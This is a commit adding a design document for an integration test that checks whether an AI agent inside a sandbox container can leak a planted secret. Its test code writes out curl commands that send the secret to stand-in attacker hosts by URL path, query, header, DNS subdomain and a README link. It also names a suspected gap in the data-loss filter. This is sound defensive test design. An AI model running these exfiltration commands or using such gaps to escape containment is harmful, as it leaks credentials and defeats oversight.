docs(prd-0022): end-to-end sandbox-escape integration test
Draft a PRD for a composite integration test that brings up a real bottle with a known allowlist + planted secret and runs five attacks from inside the agent container: 1. Request to non-allowlisted hostname 2. Request to non-allowlisted IP (incl. host-header spoof) 3. Secret exfil via HTTP — path / query / body / headers 4. Secret exfil via crafted DNS subdomain 5. Secret exfil via README link pushed through git-gate Each attack passes only when blocked with a permissions error. The suite is backend-agnostic — runs against whatever CLAUDE_BOTTLE_BACKEND selects — so it becomes the gate the upcoming smolmachines spike has to pass before that backend can substitute for Docker. Sized into 5 chunks (fixture → attacks 1+2 → attack 3 → attack 4 → attack 5). Seven open questions called out, biggest being: today's pipelock probably leaks via header / path / query because DLP only scans bodies — the test will expose this as a real gap (chunk 3 lands with `expectedFailure` markers if so).
This commit is contained in:
@@ -0,0 +1,415 @@
|
||||
# PRD 0022: End-to-end sandbox-escape integration test
|
||||
|
||||
- **Status:** Draft
|
||||
- **Author:** didericis
|
||||
- **Created:** 2026-05-26
|
||||
|
||||
## Summary
|
||||
|
||||
A new integration test, `tests/integration/test_sandbox_escape.py`,
|
||||
that brings up a real bottle with a known allowlist + a known
|
||||
in-bottle secret, then runs five attacks from inside the agent
|
||||
container and asserts each one fails. The five categories are
|
||||
the live cross-section of how the sandbox is supposed to be
|
||||
load-bearing:
|
||||
|
||||
1. Request to a non-allowlisted hostname
|
||||
2. Request to a non-allowlisted IP literal
|
||||
3. Secret exfiltration to an allowed dest via HTTP (URL path,
|
||||
query string, request body, request headers)
|
||||
4. Secret exfiltration to an allowed dest via crafted DNS
|
||||
(subdomain-encoded host)
|
||||
5. Secret exfiltration via a link inside a README pushed
|
||||
through git-gate
|
||||
|
||||
The suite is the backend-agnostic gate the smolmachines work
|
||||
has to pass before that backend can be considered a viable
|
||||
substitute for Docker. Today's Docker backend is the
|
||||
backend-under-test; the suite runs against whatever
|
||||
`CLAUDE_BOTTLE_BACKEND` resolves to.
|
||||
|
||||
## Problem
|
||||
|
||||
The sandbox today is a composition of layers (pipelock,
|
||||
egress, git-gate, `--internal` network, supervise) each tested
|
||||
in isolation but never as a whole. The supervise integration
|
||||
test exercises the MCP plumbing; `test_orphan_cleanup` covers
|
||||
the cleanup CLI; the per-sidecar integration tests bring up
|
||||
one sidecar at a time. None of them ask the operator-relevant
|
||||
question: **can an in-bottle agent get a secret out?**
|
||||
|
||||
That's the question every prospective backend has to answer
|
||||
before it can ship. Smolmachines (or any other VM-based
|
||||
backend) will reimplement the sidecar topology over a
|
||||
different runtime. Without a backend-agnostic test we'd be
|
||||
reading the layers' code by eye to confirm each new backend
|
||||
glues them correctly. The diff between "looks right" and
|
||||
"actually blocks exfil" is the whole point of the project.
|
||||
|
||||
## Goals / Success Criteria
|
||||
|
||||
The test suite passes when **every one of the five attacks
|
||||
fails** with a clear permissions-error signal:
|
||||
|
||||
1. **Hostname not in allowlist.** Agent's `curl
|
||||
https://evil.example.com/` returns non-200 (proxy
|
||||
rejection, connection error, or 403). The test asserts the
|
||||
exit code is non-zero AND the response body / stderr does
|
||||
not contain the upstream's actual response.
|
||||
|
||||
2. **IP literal not in allowlist.** Agent's `curl
|
||||
https://198.51.100.1/` (RFC 5737 documentation range) is
|
||||
blocked. Additionally tests `curl --resolve
|
||||
api.anthropic.com:443:198.51.100.1 https://api.anthropic.com/`
|
||||
to confirm the host header trick doesn't bypass DNS
|
||||
resolution.
|
||||
|
||||
3. **Secret in HTTP request to an allowed destination.** A
|
||||
known SECRET env var is planted in the bottle. The agent
|
||||
tries four shapes against the allowlisted destination:
|
||||
- Secret in URL path: `GET /v1/<SECRET>`
|
||||
- Secret in query string: `GET /v1/?leak=<SECRET>`
|
||||
- Secret in request body: `POST /v1/messages` with JSON
|
||||
containing the secret
|
||||
- Secret in request headers: `GET /v1/` with
|
||||
`X-Custom: <SECRET>`
|
||||
The test asserts pipelock's DLP body scanner rejects (3)
|
||||
and surfaces what (1)/(2)/(4) actually do — they may
|
||||
currently pass through (see open questions).
|
||||
|
||||
4. **Secret-bearing DNS subdomain to allowed dest's parent.**
|
||||
Agent runs `curl https://<SECRET>.api.anthropic.com/`. The
|
||||
hostname is constructed to look "under" an allowlisted
|
||||
apex but the SECRET payload leaks via the DNS query to
|
||||
whichever resolver pipelock/egress consults. The test
|
||||
asserts pipelock rejects the host BEFORE issuing the DNS
|
||||
query (host-allowlist matches the exact apex, not
|
||||
subdomains).
|
||||
|
||||
5. **Secret-bearing link in a PR README.** Agent edits
|
||||
`README.md` to include
|
||||
`[click](https://attacker.example.com/?leak=<SECRET>)`,
|
||||
commits, and `git push`es through git-gate. The pre-receive
|
||||
hook's gitleaks scan must reject the push because the
|
||||
secret matches one of gitleaks's bundled rules.
|
||||
|
||||
The "pass" condition is uniform across all five: the attack's
|
||||
exit code is non-zero AND the secret never reaches a network
|
||||
destination outside the bottle.
|
||||
|
||||
## Non-goals
|
||||
|
||||
- **Detecting exfiltration via side channels** — timing,
|
||||
cache state, error-message-length oracles. v1 covers the
|
||||
direct paths only.
|
||||
- **Asserting on specific error messages or HTTP status
|
||||
codes.** Each layer (pipelock / egress / git-gate /
|
||||
gitleaks) has its own rejection vocabulary. The test
|
||||
asserts on the OUTCOME (attack failed, no upstream traffic)
|
||||
not the WORDING.
|
||||
- **Testing the Docker backend's specific sandbox
|
||||
implementation in detail.** That's what the per-sidecar
|
||||
integration tests already do. This suite is composite: did
|
||||
the whole bottle prevent leakage, regardless of which layer
|
||||
caught it?
|
||||
- **A network-tap that confirms zero packets reached
|
||||
attacker.example.com.** Out of scope for v1; we trust the
|
||||
pipelock/egress error reporting and verify exit codes. If
|
||||
we want zero-packets confirmation later, a host-side
|
||||
iptables / pcap layer can extend the suite.
|
||||
- **Running against a backend that doesn't exist yet.** The
|
||||
suite is written against the abstract `BottleBackend` API
|
||||
via the existing `get_bottle_backend()` selector; future
|
||||
smolmachines work flips
|
||||
`CLAUDE_BOTTLE_BACKEND=smolmachines` and reruns. No
|
||||
smolmachines-specific code here.
|
||||
|
||||
## Scope
|
||||
|
||||
### In scope
|
||||
|
||||
- A new `tests/integration/test_sandbox_escape.py` with one
|
||||
TestSandboxEscape class and one `test_<n>_<category>`
|
||||
method per attack.
|
||||
- A test fixture that:
|
||||
- Builds a manifest with one bottle, one agent
|
||||
- The bottle declares: a few allowlisted egress routes
|
||||
(api.anthropic.com, etc.), a git-gate upstream pointing
|
||||
at a throwaway repo, supervise off (not under test)
|
||||
- Plants a known `TEST_SECRET` value in the bottle's env.
|
||||
The value matches a gitleaks rule (e.g., shaped like an
|
||||
Anthropic API key) so the README test fires the right
|
||||
pre-receive rejection.
|
||||
- A `_run_in_agent(script)` helper that wraps
|
||||
`bottle.exec(script)` and returns an `ExecResult`.
|
||||
- Assertions per category that read the existing
|
||||
`ExecResult.returncode` / `.stdout` / `.stderr`.
|
||||
|
||||
### Out of scope
|
||||
|
||||
- The per-attack remediation engines. If a category's
|
||||
assertion fails, the test is reporting a real gap — the
|
||||
remediation is its own PRD.
|
||||
- Running the suite as part of every PR's CI. v1 lives in
|
||||
`tests/integration/` and runs locally on demand; CI
|
||||
integration is a follow-up that has to weigh wall-clock
|
||||
cost (bringup is ~10s per test class).
|
||||
|
||||
## Proposed design
|
||||
|
||||
### Single fixture per attack class
|
||||
|
||||
`setUpClass` brings the bottle up once; `tearDownClass`
|
||||
brings it down. Per-test setup is cheap (resetting any
|
||||
secret-content-storage). The five attacks share the same
|
||||
bottle so the suite is ~15s wall-clock total instead of
|
||||
~50s with per-test bringup.
|
||||
|
||||
### Bottle manifest
|
||||
|
||||
```yaml
|
||||
# tests/integration/fixtures/sandbox-escape/agents/sandbox-tester.md
|
||||
---
|
||||
bottle: dev
|
||||
---
|
||||
|
||||
(no prompt — exec_claude isn't called)
|
||||
```
|
||||
|
||||
```yaml
|
||||
# tests/integration/fixtures/sandbox-escape/bottles/dev.md
|
||||
---
|
||||
env:
|
||||
- name: TEST_SECRET
|
||||
value: sk-ant-api03-fake-shape-but-realistic-length-for-gitleaks
|
||||
|
||||
egress:
|
||||
routes:
|
||||
- host: api.anthropic.com
|
||||
|
||||
git:
|
||||
- Name: throwaway
|
||||
Upstream: ssh://git@127.0.0.1:22/throwaway.git
|
||||
IdentityFile: ~/.ssh/cb-test-key # fixture key
|
||||
---
|
||||
```
|
||||
|
||||
`TEST_SECRET` is shaped like an Anthropic API key so
|
||||
gitleaks's `anthropic-api-key` rule fires on the README. We
|
||||
don't ship a real key; the prefix-pattern + length match the
|
||||
rule's regex.
|
||||
|
||||
The git upstream URL is unreachable on purpose — we want
|
||||
git-gate's pre-receive hook to reject the push BEFORE it
|
||||
tries to forward to a real upstream. The hook's gitleaks
|
||||
scan happens first.
|
||||
|
||||
### Per-attack scaffolding
|
||||
|
||||
Each test calls `bottle.exec(script)` (the existing
|
||||
`Bottle.exec` from `claude_bottle.backend.Bottle`) and
|
||||
asserts on the returncode + stdout + stderr.
|
||||
|
||||
The agent container has `curl`, `git`, `dig`, etc. pre-
|
||||
installed (already true today for the Docker bottle image).
|
||||
|
||||
### Attack-1: hostname not in allowlist
|
||||
|
||||
```python
|
||||
def test_1_hostname_not_in_allowlist(self):
|
||||
result = self.bottle.exec(
|
||||
'curl --silent --max-time 5 --fail '
|
||||
'https://evil.example.com/ ; echo "exit=$?"'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
# The attack's stdout should not contain anything from
|
||||
# evil.example.com — pipelock should have stopped it.
|
||||
self.assertNotIn("evil.example.com", result.stdout)
|
||||
self.assertIn("exit=", result.stdout)
|
||||
# extract the curl exit, assert non-zero
|
||||
...
|
||||
```
|
||||
|
||||
### Attack-2: IP literal not in allowlist
|
||||
|
||||
```python
|
||||
def test_2_ip_not_in_allowlist(self):
|
||||
# Direct IP
|
||||
result = self.bottle.exec(
|
||||
'curl --silent --max-time 5 --fail https://198.51.100.1/'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
# Host-header spoof
|
||||
result = self.bottle.exec(
|
||||
'curl --silent --max-time 5 --fail '
|
||||
'--resolve api.anthropic.com:443:198.51.100.1 '
|
||||
'https://api.anthropic.com/'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
```
|
||||
|
||||
### Attack-3: HTTP exfil shapes
|
||||
|
||||
Loop over four shapes (path / query / body / header),
|
||||
assert each one is blocked by either pipelock's DLP or
|
||||
egress's path-filter. Headers in particular may not be DLP-
|
||||
scanned today — surface that gap clearly if so.
|
||||
|
||||
```python
|
||||
SHAPES = [
|
||||
("path", 'curl -sf "https://api.anthropic.com/v1/$TEST_SECRET"'),
|
||||
("query", 'curl -sf "https://api.anthropic.com/v1/?leak=$TEST_SECRET"'),
|
||||
("body", 'curl -sf -X POST "https://api.anthropic.com/v1/messages" '
|
||||
'-H "Content-Type: application/json" '
|
||||
'-d "{\\"secret\\": \\"$TEST_SECRET\\"}"'),
|
||||
("header", 'curl -sf "https://api.anthropic.com/v1/" '
|
||||
'-H "X-Custom: $TEST_SECRET"'),
|
||||
]
|
||||
|
||||
def test_3_http_exfil_blocked(self):
|
||||
for name, cmd in SHAPES:
|
||||
with self.subTest(shape=name):
|
||||
result = self.bottle.exec(cmd)
|
||||
self.assertNotEqual(
|
||||
0, result.returncode,
|
||||
f"{name} exfil should have been blocked",
|
||||
)
|
||||
```
|
||||
|
||||
### Attack-4: DNS exfil via crafted subdomain
|
||||
|
||||
```python
|
||||
def test_4_dns_exfil_blocked(self):
|
||||
result = self.bottle.exec(
|
||||
'curl --silent --max-time 5 --fail '
|
||||
'"https://$TEST_SECRET.api.anthropic.com/"'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
```
|
||||
|
||||
Asserts the host wasn't in pipelock's exact-match allowlist
|
||||
(api.anthropic.com matches `api.anthropic.com`, not
|
||||
`<secret>.api.anthropic.com`).
|
||||
|
||||
### Attack-5: secret in README push
|
||||
|
||||
```python
|
||||
def test_5_readme_push_blocked(self):
|
||||
result = self.bottle.exec(
|
||||
'cd /tmp && git init test-repo && cd test-repo && '
|
||||
'git config user.email "test@example.com" && '
|
||||
'git config user.name "test" && '
|
||||
'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && '
|
||||
'git add . && git commit -m "leak" && '
|
||||
'git remote add origin '
|
||||
'git://claude-bottle-git-gate-<slug>/throwaway.git && '
|
||||
'git push origin master'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
self.assertIn("gitleaks", (result.stderr + result.stdout).lower())
|
||||
```
|
||||
|
||||
The `<slug>` is templated via the bottle's known identity at
|
||||
fixture-time. Asserts gitleaks fired (looking for the
|
||||
literal "gitleaks" in stderr).
|
||||
|
||||
## Implementation chunks
|
||||
|
||||
Sized small.
|
||||
|
||||
1. **Fixture manifest + secret env-var plumbing.** Just the
|
||||
files under `tests/integration/fixtures/sandbox-escape/`
|
||||
and the test class scaffolding with `setUpClass` /
|
||||
`tearDownClass` bringing up + tearing down the bottle.
|
||||
No attack tests yet.
|
||||
2. **Attack 1 + 2 (hostname + IP).** The simplest two —
|
||||
curl returns non-zero, that's the assertion.
|
||||
3. **Attack 3 (HTTP exfil shapes).** Parameterized over the
|
||||
four shapes via subTest. Likely surfaces gaps in current
|
||||
DLP coverage for header / path / query shapes.
|
||||
4. **Attack 4 (DNS exfil).** Exact-match-allowlist
|
||||
verification.
|
||||
5. **Attack 5 (README push via git-gate).** Hardest because
|
||||
it requires the git-gate sidecar configured and the
|
||||
gitleaks rule fired. The "throwaway" upstream URL is
|
||||
intentionally unreachable to keep the test fully
|
||||
self-contained.
|
||||
|
||||
## Open questions
|
||||
|
||||
1. **What does today's pipelock actually do for shapes 3.1,
|
||||
3.2, 3.4?** DLP body-scanning is a known feature; URL /
|
||||
path / header scanning is less clear. The test will tell
|
||||
us — if a shape passes today (attack succeeds), it's a
|
||||
real gap and the test fails LOUDLY rather than silently
|
||||
passing. Either:
|
||||
- Treat the test as authoritative: every shape MUST block
|
||||
for the suite to pass. Failing shapes are real bugs.
|
||||
- Treat the test as descriptive: mark the failing shapes
|
||||
`expectedFailure` and resolve them in a follow-up PRD.
|
||||
|
||||
Lean toward the first — the project's purpose is sandbox
|
||||
integrity; documenting "we knowingly leak headers" is
|
||||
worse than fixing it. But for v1 of this test it's OK to
|
||||
land with `expectedFailure` markers + tickets.
|
||||
|
||||
2. **DNS exfil via the agent's direct DNS resolver.** Today
|
||||
the agent's `--internal` network has no default gateway,
|
||||
so direct DNS queries to 8.8.8.8 fail. The crafted-
|
||||
hostname attack rides on pipelock's resolution, which is
|
||||
what test 4 covers. Should we ALSO test that direct DNS
|
||||
(e.g., `dig @8.8.8.8 secret.example.com`) is blocked?
|
||||
Probably yes — adds one assertion to test 4 and confirms
|
||||
the network isolation is intact.
|
||||
|
||||
3. **Realistic fake secret.** `sk-ant-api03-...` shape is
|
||||
what gitleaks's anthropic-api-key rule matches. Verify
|
||||
the exact regex before settling on the fixture value;
|
||||
wrong-shape secret would mean attack 5 silently passes
|
||||
the wrong way (gitleaks doesn't fire, README ships).
|
||||
|
||||
4. **Reachability of throwaway git upstream.** Pointing at
|
||||
`ssh://git@127.0.0.1:22/throwaway.git` means git-gate
|
||||
would try (and fail) to push to upstream after gitleaks
|
||||
passes. We want gitleaks to REJECT before any upstream
|
||||
attempt — so the push always fails at gitleaks, never
|
||||
later. Confirm this ordering in git-gate's pre-receive
|
||||
sequence.
|
||||
|
||||
5. **CI vs. local-only.** The integration test takes ~15s
|
||||
(compose-up + 5 attacks + teardown). Running it on every
|
||||
PR pays for itself the first time it catches a sandbox
|
||||
regression but slows the green-tick feedback for unrelated
|
||||
PRs. v1 ships as a local-only test; CI integration is a
|
||||
follow-up that decides whether to gate merges on it.
|
||||
|
||||
6. **Backend-agnostic invocation.** The suite reads
|
||||
`CLAUDE_BOTTLE_BACKEND` so it runs against whatever
|
||||
backend is active. For the smolmachines spike, the
|
||||
developer sets that env var + runs the same test file.
|
||||
No code change needed in the suite itself. Worth
|
||||
verifying the existing `get_bottle_backend()` machinery
|
||||
handles the backend-not-yet-implemented case gracefully
|
||||
(it dies with a clear message today — confirm that's
|
||||
what we want).
|
||||
|
||||
7. **Test environment requirements.** The agent container
|
||||
needs `curl`, `git`, `dig`. Already in today's Docker
|
||||
image; need to declare these as required for any
|
||||
future backend's base image too. Worth noting in the
|
||||
smolmachines PRD.
|
||||
|
||||
## References
|
||||
|
||||
- PRD 0017 — egress-proxy + path-allowlist + auth injection
|
||||
(the layer test 3 + 4 stresses)
|
||||
- PRD 0014 / 0015 — pipelock / egress remediation flows (the
|
||||
surfaces the attacks would propose changes to if denied
|
||||
via the supervise route)
|
||||
- PRD 0008 — git-gate + pre-receive gitleaks (the layer
|
||||
test 5 stresses)
|
||||
- PRD 0018 — compose-per-instance (the topology the test
|
||||
brings up)
|
||||
- `tests/integration/test_supervise_sidecar.py` — the
|
||||
existing single-sidecar integration test pattern this
|
||||
suite generalizes
|
||||
Reference in New Issue
Block a user